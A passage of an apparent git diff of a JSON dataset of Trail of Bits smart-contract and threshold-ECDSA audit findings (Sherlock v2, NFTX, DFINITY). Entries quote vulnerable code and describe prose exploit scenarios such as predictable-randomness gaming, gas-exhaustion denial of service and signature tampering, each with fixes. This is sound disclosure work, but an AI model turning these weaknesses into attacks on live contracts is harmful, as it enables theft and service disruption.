function removeSherDistributionManager() external override onlyOwner { if (address(sherDistributionManager) == address(0)) revert InvalidConditions(); emit SherDistributionManagerUpdated( sherDistributionManager, ISherDistributionManager(address(0)) ); delete sherDistributionManager; } Figure 4.1: contracts/Sherlock.sol:206-214 Of all the connected contracts, the only one that can be removed is the sherDistributionManager contract. On the other hand, all of the connected contracts can be replaced through an update function. function pause() external onlyOwner { _pause(); yieldStrategy.pause(); sherDistributionManager.pause(); sherlockProtocolManager.pause(); sherlockClaimManager.pause(); } /// @notice Unpause external functions in all contracts function unpause() external onlyOwner { _unpause(); yieldStrategy.unpause(); sherDistributionManager.unpause(); sherlockProtocolManager.unpause(); sherlockClaimManager.unpause(); } Figure 4.2: contracts/Sherlock.sol:302-317 If the sherDistributionManager contract is removed, a call to Sherlock.pause will revert, as it is attempting to call the zero address. If sherDistributionManager is removed while the system is paused, then a call to Sherlock.unpause will revert for the same reason. If any of the contracts is replaced while the system is paused, the replaced contract will be in an unpaused state while the other contracts are still paused. As a result, a call to Sherlock.unpause will revert, as it is attempting to unpause an already unpaused contract. Exploit Scenario Bob, the owner of the Sherlock contract, pauses the system to replace the sherlockProtocolManager contract, which contains a bug. Bob deploys a new sherlockProtocolManager contract and calls updateSherlockProtocolManager to set the new address in the Sherlock contract. To unpause the system, Bob calls Sherlock.unpause, which reverts because sherlockProtocolManager is already unpaused. Recommendations Short term, add conditional checks to the Sherlock.pause and Sherlock.unpause functions to check that a contract is either paused or unpaused, as expected, before attempting to update its state. For sherDistributionManager, the check should verify that the contract to be paused or unpaused is not the zero address. Long term, for pieces of code that depend on the states of multiple contracts, implement unit tests that cover each possible combination of contract states.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Medium" ] }, { "title": "2. Missing validation of proxy admin indices ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", "body": "Multiple functions of the ProxyController contract take an index as an input. The index determines which proxy (managed by the controller) is being targeted. However, the index is never validated, which means that the function will be executed even if the index is out of bounds with respect to the number of proxies managed by the contract (in this case, five). function changeProxyAdmin(uint256 index, address newAdmin) public onlyOwner { if (index == 0) { vaultFactoryProxy.changeAdmin(newAdmin); } else if (index == 1) { eligManagerProxy.changeAdmin(newAdmin); } else if (index == 2) { stakingProviderProxy.changeAdmin(newAdmin); } else if (index == 3) { stakingProxy.changeAdmin(newAdmin); } else if (index == 4) { feeDistribProxy.changeAdmin(newAdmin); } emit ProxyAdminChanged(index, newAdmin); } Figure 2.1: The changeProxyAdmin function in ProxyController.sol:79-95 In the changeProxyAdmin function, a ProxyAdminChanged event is emitted even if the supplied index is out of bounds (figure 2.1). Other ProxyController functions return the zero address if the index is out of bounds. For example, getAdmin() should return the address of the targeted proxy's admin. If getAdmin() returns the zero address, the caller cannot know whether she supplied the wrong index or whether the targeted proxy simply has no admin. function getAdmin(uint256 index) public view returns (address admin) { if (index == 0) { return vaultFactoryProxy.admin(); } else if (index == 1) { return eligManagerProxy.admin(); } else if (index == 2) { return stakingProviderProxy.admin(); } else if (index == 3) { return stakingProxy.admin(); } else if (index == 4) { return feeDistribProxy.admin(); } } Figure 2.2: The getAdmin function in ProxyController.sol:38-50 Exploit Scenario A contract relying on the ProxyController contract calls one of the view functions, like getAdmin(), with the wrong index. The function is executed normally and implicitly returns zero, leading to unexpected behavior. Recommendations Short term, document this behavior so that clients are aware of it and are able to include safeguards to prevent unanticipated behavior. Long term, consider adding an index check to the affected functions so that they revert if they receive an out-of-bounds index.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Medium" ] }, { "title": "3. Random token withdrawals can be gamed ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", "body": "The algorithm used to randomly select a token for withdrawal from a vault is deterministic and predictable. function getRandomTokenIdFromVault() internal virtual returns (uint256) { uint256 randomIndex = uint256( keccak256( abi.encodePacked( blockhash(block.number - 1), randNonce, block.coinbase, block.difficulty, block.timestamp ) ) ) % holdings.length(); ++randNonce; return holdings.at(randomIndex); } Figure 3.1: The getRandomTokenIdFromVault function in NFTXVaultUpgradable.sol:531-545 All the elements used to calculate randomIndex are known to the caller (figure 3.1). Therefore, a contract calling this function can predict the resulting token before choosing to execute the withdrawal.
This finding is of high difficulty because NFTX's vault economics incentivizes users to deposit tokens of equal value. Moreover, the cost of deploying a custom exploit contract will likely outweigh the fee savings of choosing a token at random for withdrawal. Exploit Scenario Alice wishes to withdraw a specific token from a vault but wants to pay the lower random redemption fee rather than the higher target redemption fee. She deploys a contract that checks whether the randomly chosen token is her target and, if so, automatically executes the random withdrawal. Recommendations Short term, document the risks described in this finding so that clients are aware of them. Long term, consider removing all randomness from NFTX.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Medium" ] }, { "title": "5. SHER reward calculation uses confusing six-decimal SHER reward rate ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", "body": "The reward calculation in calcReward uses a six-decimal SHER reward rate value. This might confuse readers and developers of the contracts because the SHER token has 18 decimals, and the calculated reward will also have 18 decimals. Also, this value does not allow the SHER reward rate to be set below 0.000001000000000000 SHER. function calcReward( uint256 _tvl, uint256 _amount, uint256 _period ) public view override returns (uint256 _sher) { [..] // If there are some max rewards available... if (maxRewardsAvailable != 0) { // And if the entire stake is still within the maxRewardsAvailable amount if (_amount <= maxRewardsAvailable) { // Then the entire stake amount should accrue max SHER rewards return (_amount * maxRewardsRate * _period) * DECIMALS; } else { // Otherwise, the stake takes all the maxRewardsAvailable left // We add the maxRewardsAvailable amount to the TVL (now _tvl _tvl += maxRewardsAvailable; // We subtract the amount of the stake that received max rewards _amount -= maxRewardsAvailable; // We accrue the max rewards available at the max rewards // This could be: $20M of maxRewardsAvailable which gets // Calculation continues after this _sher += (maxRewardsAvailable * maxRewardsRate * _period) * DECIMALS; } } // If there are SHER rewards still available if (slopeRewardsAvailable != 0) { _sher += (((zeroRewardsStartTVL - position) * _amount * maxRewardsRate * _period) / (zeroRewardsStartTVL - maxRewardsEndTVL)) * DECIMALS; } } Figure 5.1: contracts/managers/SherDistributionManager.sol:89-149 In the reward calculation, the 6-decimal maxRewardsRate is first multiplied by _amount and _period, resulting in a 12-decimal intermediate product. To output a final 18-decimal product, this 12-decimal product is multiplied by DECIMALS to add 6 decimals. Although this leads to a correct result, it would be clearer to use an 18-decimal value for maxRewardsRate and to divide by DECIMALS at the end of the calculation. // using 6 decimal maxRewardsRate (10e6 * 1e6 * 10) * 1e6 = 100e18 = 100 SHER // using 18 decimal maxRewardsRate (10e6 * 1e18 * 10) / 1e6 = 100e18 = 100 SHER Figure 5.2: Comparison of a 6-decimal and an 18-decimal maxRewardsRate Exploit Scenario Bob, a developer of the Sherlock protocol, writes a new version of the SherDistributionManager contract that changes the reward calculation. He mistakenly assumes that the SHER maxRewardsRate has 18 decimals and updates the calculation incorrectly. As a result, the newly calculated reward is incorrect.
Recommendations Short term, use an 18-decimal value for maxRewardsRate and divide by DECIMALS instead of multiplying. Long term, when implementing calculations that use the rate of a given token, strive to use a rate variable with the same number of decimals as the token. This will prevent any confusion with regard to decimals, which might lead to introducing precision bugs when updating the contracts.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4052,59 +6750,49 @@ ] }, { - "title": "4. Duplicate receivers allowed by addReceiver() ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "The NFTXSimpleFeeDistributor contract is in charge of protocol fee distribution. To facilitate the fee distribution process, it allows the contract owner (the NFTX DAO) to manage a list of fee receivers. To add a new fee receiver to the contract, the owner calls the addReceiver() function. function addReceiver( uint256 _allocPoint, address _receiver, bool _isContract ) external override virtual onlyOwner { _addReceiver(_allocPoint, _receiver, _isContract); } Figure 4.1: The addReceiver() function in NFTXSimpleFeeDistributor This function in turn executes the internal logic that pushes a new receiver to the receiver list. function _addReceiver( uint256 _allocPoint, address _receiver, bool _isContract ) internal virtual { FeeReceiver memory _feeReceiver = FeeReceiver(_allocPoint, _receiver, _isContract); feeReceivers.push(_feeReceiver); allocTotal += _allocPoint; emit AddFeeReceiver(_receiver, _allocPoint); } Figure 4.2: The _addReceiver() function in NFTXSimpleFeeDistributor However, the function does not check whether the receiver is already in the list. Without this check, receivers can be accidentally added multiple times to the list, which would increase the amount of fees they receive. The issue is of high diculty because the addReceiver() function is owner-protected and, as indicated by the NFTX team, the owner is the NFTX DAO. Because the DAO itself was out of scope for this review, we do not know what the process to become a receiver looks like. We assume that a DAO proposal has to be created and a certain quorum has to be met for it to be executed. Exploit Scenario A proposal is created to add a new receiver to the fee distributor contract. The receiver address was already added, but the DAO members are not aware of this. The proposal passes, and the receiver is added. The receiver gains more fees than he is entitled to. Recommendations Short term, document this behavior so that the NFTX DAO is aware of it and performs the adequate checks before adding a new receiver. Long term, consider adding a duplicate check to the _addReceiver() function.", + "title": "6. A claim cannot be paid out or escalated if the protocol agent changes after the claim has been initialized ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The escalate and payoutClaim functions can be called only by the protocol agent that started the claim. Therefore, if the protocol agent role is reassigned after a claim is started, the new protocol agent will be unable to call these functions and complete the claim. 
function escalate(uint256 _claimID, uint256 _amount) external override nonReentrant whenNotPaused { if (_amount < BOND) revert InvalidArgument(); // Gets the internal ID of the claim bytes32 claimIdentifier = publicToInternalID[_claimID]; if (claimIdentifier == bytes32(0)) revert InvalidArgument(); // Retrieves the claim struct Claim storage claim = claims_[claimIdentifier]; // Requires the caller to be the protocol agent if (msg.sender != claim.initiator) revert InvalidSender(); Figure 6.1: contracts/managers/SherlockClaimManager.sol:388-403 Due to this scheme, care should be taken when updating the protocol agent. That is, the protocol agent should not be reassigned if there is an existing claim. However, if the protocol agent is changed when there is an existing claim, the protocol agent role could be transferred back to the original protocol agent to complete the claim. Exploit Scenario Alice is the protocol agent and starts a claim. Alice transfers the protocol agent role to Bob. The claim is approved by SPCC and can be paid out. Bob calls payoutClaim, but the transaction reverts. Recommendations Short term, update the comment in the escalate and payoutClaim functions to state that the caller needs to be the protocol agent that started the claim, and clearly describe this requirement in the protocol agent documentation. Alternatively, update the check to verify that msg.sender is the current protocol agent rather than specifically the protocol agent who initiated the claim. Long term, review and document the effects of the reassignment of privileged roles on the system's state transitions. Such a review will help uncover cases in which the reassignment of privileged roles causes issues and possibly a denial of service to (part of) the system.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "5. OpenZeppelin vulnerability can break initialization ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "NFTX extensively uses OpenZeppelin v3.4.1. A bug was recently discovered in all OpenZeppelin versions prior to v4.4.1 that affects initializer functions invoked separately during contract creation: the bug causes the contract initialization modifier to fail to prevent reentrancy to the initializers (see CVE-2021-46320). Currently, no external calls to untrusted code are made during contract initialization. However, if the NFTX team were to add a new feature that requires such calls to be made, it would have to add the necessary safeguards to prevent reentrancy. Exploit Scenario An NFTX contract initialization function makes a call to an external contract that calls back to the initializer with different arguments. The faulty OpenZeppelin initializer modifier fails to prevent this reentrancy. Recommendations Short term, upgrade OpenZeppelin to v4.4.1 or newer. Long term, integrate a dependency-checking tool like Dependabot into the NFTX CI process.", + "title": "7. Missing input validation in setMinActiveBalance could cause a confusing event to be emitted ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The setMinActiveBalance function's input validation is incomplete: it should check that the minActiveBalance has not been set to its existing value, but this check is missing. 
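The missing check is a one-line addition; as a sketch (the 'SAME_VALUE' message is illustrative, not existing code): require(_minActiveBalance != minActiveBalance, 'SAME_VALUE'); placed before the MinBalance event is emitted in figure 7.1 below. 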
Additionally, if the minActiveBalance is set to its existing value, the emitted MinBalance event will indicate that the old and new values are identical. This could confuse systems monitoring the contract that expect this event to be emitted only when the minActiveBalance changes. function setMinActiveBalance(uint256 _minActiveBalance) external override onlyOwner { // Can't set a value that is too high to be reasonable require(_minActiveBalance < MIN_BALANCE_SANITY_CEILING, 'INSANE'); emit MinBalance(minActiveBalance, _minActiveBalance); minActiveBalance = _minActiveBalance; } Figure 7.1: contracts/managers/SherlockProtocolManager.sol:422-428 Exploit Scenario An off-chain monitoring system controlled by the Sherlock protocol is listening for events that indicate that a contract configuration value has changed. When such events are detected, the monitoring system sends an email to the admins of the Sherlock protocol. Alice, a contract owner, calls setMinActiveBalance with the existing minActiveBalance as input. The off-chain monitoring system detects the emitted event and notifies the Sherlock protocol admins. The Sherlock protocol admins are confused since the value did not change. Recommendations Short term, add input validation that causes setMinActiveBalance to revert if the proposed minActiveBalance value equals the current value. Long term, document and test the expected behavior of all the system's events. Consider using a blockchain-monitoring system to track any suspicious behavior in the contracts.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" - ] - }, - { - "title": "6. Potentially excessive gas fees imposed on users for protocol fee distribution ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Whenever a user executes a minting, redeeming, or swapping operation on a vault, a fee is charged to the user and is sent to the NFTXSimpleFeeDistributor contract for distribution. function _chargeAndDistributeFees(address user, uint256 amount) internal virtual { // Do not charge fees if the zap contract is calling // Added in v1.0.3. Changed to mapping in v1.0.5. INFTXVaultFactory _vaultFactory = vaultFactory; if (_vaultFactory.excludedFromFees(msg.sender)) { return; } // Mint fees directly to the distributor and distribute. if (amount > 0) { address feeDistributor = _vaultFactory.feeDistributor(); // Changed to a _transfer() in v1.0.3. _transfer(user, feeDistributor, amount); INFTXFeeDistributor(feeDistributor).distribute(vaultId); } } Figure 6.1: The _chargeAndDistributeFees() function in NFTXVaultUpgradeable.sol After the fee is sent to the NFTXSimpleFeeDistributor contract, the distribute() function is then called to distribute all accrued fees. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? 
currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 6.2: The distribute() function in NFTXSimpleFeeDistributor.sol If the token balance of the contract is low enough (but not zero), the number of tokens distributed to each receiver (amountToSend) will be close to zero. Ultimately, this can disincentivize the use of the protocol, regardless of the number of tokens distributed. Users have to pay the gas fee for the fee distribution operation, the gas fees for the token operations (e.g., redeeming, minting, or swapping), and the protocol fees themselves. Exploit Scenario Alice redeems a token from a vault, pays the necessary protocol fee, sends it to the NFTXSimpleFeeDistributor contract, and calls the distribute() function. Because the balance of the distributor contract is very low (e.g., $0.50), Alice has to pay a substantial amount in gas to distribute a near-zero amount in fees between all fee receiver addresses. Recommendations Short term, add a requirement for a minimum balance that the NFTXSimpleFeeDistributor contract should have for the distribution operation to execute. Alternatively, implement a periodical distribution of fees (e.g., once a day or once every number of blocks). Long term, consider redesigning the fee distribution mechanism to prevent the distribution of small fees. Also consider whether protocol users should pay for said distribution. See appendix D for guidance on redesigning this mechanism.", - "labels": [ - "Trail of Bits", - "Severity: Medium", "Difficulty: High" ] }, { - "title": "7. Risk of denial of service due to unbounded loop ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "When protocol fees are distributed, the system loops through the list of beneficiaries (known internally as receivers) to send them the protocol fees they are entitled to. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? 
currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 7.1: The distribute() function in NFTXSimpleFeeDistributor.sol Because this loop is unbounded and the number of receivers can grow, the amount of gas consumed is also unbounded. function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 7.2: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol Additionally, if one of the receivers is a contract, code that significantly increases the gas cost of the fee distribution will execute (figure 7.2). It is important to note that fees are usually distributed within the context of user transactions (redeeming, minting, etc.), so the total cost of the distribution operation depends on the logic outside of the distribute() function. Exploit Scenario The NFTX team adds a new feature that allows NFTX token holders who stake their tokens to register as receivers and gain a portion of protocol fees; because of that, the number of receivers grows dramatically. Due to the large number of receivers, the distribute() function cannot execute because the cost of executing it has reached the block gas limit. As a result, users are unable to mint, redeem, or swap tokens. Recommendations Short term, examine the execution cost of the function to determine the safe bounds of the loop and, if possible, consider splitting the distribution operation into multiple calls. Long term, consider redesigning the fee distribution mechanism to avoid unbounded loops and prevent denials of service. See appendix D for guidance on redesigning this mechanism.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", - "Difficulty: High" + "Difficulty: Medium" ] }, { + "title": "8. payoutClaim's calling of external contracts in a loop could cause a denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The payoutClaim function uses a loop to call the PreCorePayoutCallback function on a list of external contracts. If any of these calls reverts, the entire payoutClaim function reverts, and, hence, the transaction reverts. This may not be the desired behavior; if that is the case, a denial of service would prevent claims from being paid out. 
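As a sketch of the 'middle road' design discussed later in this finding (the callbackMustSucceed flag and the CallbackFailed event are hypothetical names, not existing code): for (uint256 i; i < claimCallbacks.length; i++) { try claimCallbacks[i].PreCorePayoutCallback(protocol, _claimID, amount) {} catch { if (callbackMustSucceed[i]) revert(); emit CallbackFailed(address(claimCallbacks[i]), _claimID); } } The current implementation, shown in figure 8.1 below, instead lets any revert bubble up and abort the payout. 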
for (uint256 i; i < claimCallbacks.length; i++) { claimCallbacks[i].PreCorePayoutCallback(protocol, _claimID, amount); } Figure 8.1: contracts/managers/SherlockClaimManager.sol:499-501 The owner of the SherlockClaimManager contract controls the list of contracts on which the PreCorePayoutCallback function is called. The owner can add or remove contracts from this list at any time. Therefore, if a contract is causing unexpected reverts, the owner can fix the problem by (temporarily) removing that contract from the list. It might be expected that some of these calls revert and cause the entire transaction to revert. However, the external contracts that will be called and the expected behavior in the event of a revert are currently unknown. If a revert should not cause the entire transaction to revert, the current implementation does not fulfill that requirement. To accommodate both cases (a revert of an external call either reverts the entire transaction or allows the transaction to continue), a middle road can be taken. For each contract in the list, a boolean could indicate whether the transaction should revert or continue if the external call fails. If the boolean indicates that the transaction should continue, an emitted event would indicate the contract address and the input arguments of the callback that reverted. This would allow the system to continue functioning while admins investigate the cause of the revert and fix the issue(s) if needed. Exploit Scenario Alice, the owner of the SherlockClaimManager contract, registers contract A in the list of contracts on which PreCorePayoutCallback is called. Contract A contains a bug that causes the callback to revert every time. Bob, a protocol agent, successfully files a claim and calls payoutClaim. The transaction reverts because the call to contract A reverts. Recommendations Short term, review the requirements of contracts that will be called by callback functions, and adjust the implementation to fulfill those requirements. Long term, when designing a system reliant on external components that have not yet been determined, carefully consider whether to include those integrations during the development process or to wait until those components have been identified. This will prevent unforeseen problems due to incomplete or incorrect integrations with unknown contracts.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Medium" ] }, { - "title": "8. A malicious fee receiver can cause a denial of service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Whenever a user executes a minting, redeeming, or swapping operation on a vault, a fee is charged to the user and is sent to the NFTXSimpleFeeDistributor contract for distribution. The distribution function loops through all fee receivers and sends them the number of tokens they are entitled to (see figure 7.1). If the fee receiver is a contract, a special logic is executed; instead of receiving the corresponding number of tokens, the receiver pulls all the tokens from the NFTXSimpleFeeDistributor contract. 
function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 8.1: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol In this case, because the receiver contract executes arbitrary logic and receives all of the gas, the receiver contract can spend all of it; as a result, only 1/64 of the original gas forwarded to the receiver contract would remain to continue executing the distribute() function (see EIP-150), which may not be enough to complete the execution, leading to a denial of service. The issue is of high difficulty because the addReceiver() function is owner-protected and, as indicated by the NFTX team, the owner is the NFTX DAO. Because the DAO itself was out of scope for this review, we do not know what the process to become a receiver looks like. We assume that a proposal is created and a certain quorum has to be met for it to be executed. Exploit Scenario Eve, a malicious receiver, sets up a smart contract that consumes all the gas forwarded to it when receiveRewards is called. As a result, the distribute() function runs out of gas, causing a denial of service on the vaults calling the function. Recommendations Short term, change the fee distribution mechanism so that only a token transfer is executed even if the receiver is a contract. Long term, consider redesigning the fee distribution mechanism to prevent malicious fee receivers from causing a denial of service on the protocol. See appendix D for guidance on redesigning this mechanism.", + "title": "9. pullReward could silently fail and cause stakers to lose all earned SHER rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "If the SherDistributionManager.pullReward function reverts, the calling function (_stake) will not set the SHER rewards in the staker's position NFT. As a result, the staker will not receive the payout of SHER rewards after the stake period has passed. 
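A minimal sketch of the short-term fix (replacing, not reproducing, the try/catch shown in figure 9.1 below): calling _sher = sherDistributionManager.pullReward(_amount, _period, _id, _receiver); directly, so that any failure in pullReward reverts the entire stake instead of being swallowed. 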
function _stake( uint256 _amount, uint256 _period, uint256 _id, address _receiver ) internal returns (uint256 _sher) { // Sets the timestamp at which this position can first be unstaked/restaked lockupEnd_[_id] = block.timestamp + _period; if (address(sherDistributionManager) == address(0)) return 0; // Does not allow restaking of 0 tokens if (_amount == 0) return 0; // Checks this amount of SHER tokens in this contract before we transfer new ones uint256 before = sher.balanceOf(address(this)); // pullReward() calcs then actually transfers the SHER tokens to this contract try sherDistributionManager.pullReward(_amount, _period, _id, _receiver) returns ( uint256 amount ) { _sher = amount; } catch (bytes memory reason) { // If for whatever reason the sherDistributionManager call fails emit SherRewardsError(reason); return 0; } // actualAmount should represent the amount of SHER tokens transferred to this contract for the current stake position uint256 actualAmount = sher.balanceOf(address(this)) - before; if (actualAmount != _sher) revert InvalidSherAmount(_sher, actualAmount); // Assigns the newly created SHER tokens to the current stake position sherRewards_[_id] = _sher; } Figure 9.1: contracts/Sherlock.sol:354-386 When the pullReward call reverts, the SherRewardsError event is emitted. The staker could check this event and see that no SHER rewards were set. The staker could also call the sherRewards function and provide the position's NFT ID to check whether the SHER rewards were set. However, stakers should not be expected to make these checks after every (re)stake. There are two ways in which the pullReward function can fail. First, a bug in the arithmetic could cause an overflow and revert the function. Second, if the SherDistributionManager contract does not hold enough SHER to be able to transfer the calculated amount, the pullReward function will fail. The SHER balance of the contract needs to be manually topped up. If a staker detects that no SHER was set for her (re)stake, she may want to cancel the stake. However, stakers are not able to cancel a stake until the stake's period has passed (currently, at least three months). Exploit Scenario Alice creates a new stake, but the SherDistributionManager contract does not hold enough SHER to transfer the rewards, so the pullReward call reverts. The execution continues and sets Alice's SHER reward allocation to zero. Recommendations Short term, have the system revert transactions if pullReward reverts. Long term, have the system revert transactions if part of the expected rewards are not allocated due to an internal revert. This will prevent situations in which certain users get rewards while others do not.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "9. Vault managers can grief users ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "The process of creating vaults in the NFTX protocol is trustless. This means that anyone can create a new vault and use any asset as the underlying vault NFT. The user calls the NFTXVaultFactoryUpgradeable contract to create a new vault. After deploying the new vault, the contract sets the user as the vault manager. Vault managers can disable certain vault features (figure 9.1) and change vault fees (figure 9.2). 
function setVaultFeatures( bool _enableMint, bool _enableRandomRedeem, bool _enableTargetRedeem, bool _enableRandomSwap, bool _enableTargetSwap ) public override virtual { onlyPrivileged(); enableMint = _enableMint; enableRandomRedeem = _enableRandomRedeem; enableTargetRedeem = _enableTargetRedeem; enableRandomSwap = _enableRandomSwap; enableTargetSwap = _enableTargetSwap; emit EnableMintUpdated(_enableMint); emit EnableRandomRedeemUpdated(_enableRandomRedeem); emit EnableTargetRedeemUpdated(_enableTargetRedeem); emit EnableRandomSwapUpdated(_enableRandomSwap); emit EnableTargetSwapUpdated(_enableTargetSwap); } Figure 9.1: The setVaultFeatures() function in NFTXVaultUpgradeable.sol function setFees( uint256 _mintFee, uint256 _randomRedeemFee, uint256 _targetRedeemFee, uint256 _randomSwapFee, uint256 _targetSwapFee ) public override virtual { onlyPrivileged(); vaultFactory.setVaultFees( vaultId, _mintFee, _randomRedeemFee, _targetRedeemFee, _randomSwapFee, _targetSwapFee ); } Figure 9.2: The setFees() function in NFTXVaultUpgradeable.sol The effects of these functions are instantaneous, which means users may not be able to react in time to these changes and exit the vaults. Additionally, disabling vault features with the setVaultFeatures() function can trap tokens in the contract. Ultimately, this risk is related to the trustless nature of vault creation, but the NFTX team can take certain measures to minimize the effects. One such measure, which is already in place, is vault verification, in which the vault manager calls the finalizeVault() function to pass her management rights to the zero address. This function then gives the verified status to the vault in the NFTX web application. Exploit Scenario Eve, a malicious manager, creates a new vault for a popular NFT collection. After it gains some user traction, she unilaterally changes the vault fees to the maximum (0.5 ether), which forces users to either pay the high fee or relinquish their tokens. Recommendations Short term, document the risks of interacting with vaults that have not been finalized (i.e., vaults that have managers). Long term, consider adding delays to manager-only functionality (e.g., a certain number of blocks) so that users have time to react and exit the vault.", + "title": "1. Lack of validation of signed dealing against original dealing ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", + "body": "The EcdsaPreSignerImpl::validate_dealing_support method does not check that the content of signed dealings matches the original dealings. A malicious receiver could exploit this lack of validation by changing the requested height (that is, the support.content.requested_height field) or internal data (the support.content.idk_dealing.internal_dealing_raw field) before signing the ECDSA dealing. The resulting signature would not be flagged as invalid by the validate_dealing_support method but would result in an invalid aggregated signature. After all nodes sign a dealing, the EcdsaTranscriptBuilderImpl::build_transcript method checks the signed dealings' content hashes before attempting to aggregate all the dealing support signatures to produce the final aggregated signature. The method logs a warning when the hashes do not agree, but does not otherwise act on signed dealings with different content. 
let mut content_hash = BTreeSet::new(); for share in &support_shares { content_hash.insert(ic_crypto::crypto_hash(&share.content)); } if content_hash.len() > 1 { warn!( self.log, \"Unexpected multi share content: support_shares = {}, content_hash = {}\", support_shares.len(), content_hash.len() ); self.metrics.payload_errors_inc(\"invalid_content_hash\"); } if let Some(multi_sig) = self.crypto_aggregate_dealing_support( transcript_state.transcript_params, &support_shares, ) { transcript_state.add_completed_dealing(signed_dealing.content, multi_sig); } Figure 1.1: ic/rs/consensus/src/ecdsa/pre_signer.rs:1015-1034 The dealing content is added to the set of completed dealings along with the aggregated signature. When the node attempts to create a new transcript from the dealing, the aggregated signature is checked by IDkgProtocol::create_transcript. If a malicious receiver changes the content of a dealing before signing it, the resulting invalid aggregated signature would be rejected by this method. In such a case, the EcdsaTranscriptBuilderImpl methods build_transcript and get_completed_transcript would return None for the corresponding transcript ID. That is, neither the transcript nor the corresponding quadruple would be completed. Additionally, since signing requests are deterministically matched against quadruples, including quadruples that are not yet available, this issue could allow a single node to block the service of individual signing requests. pub(crate) fn 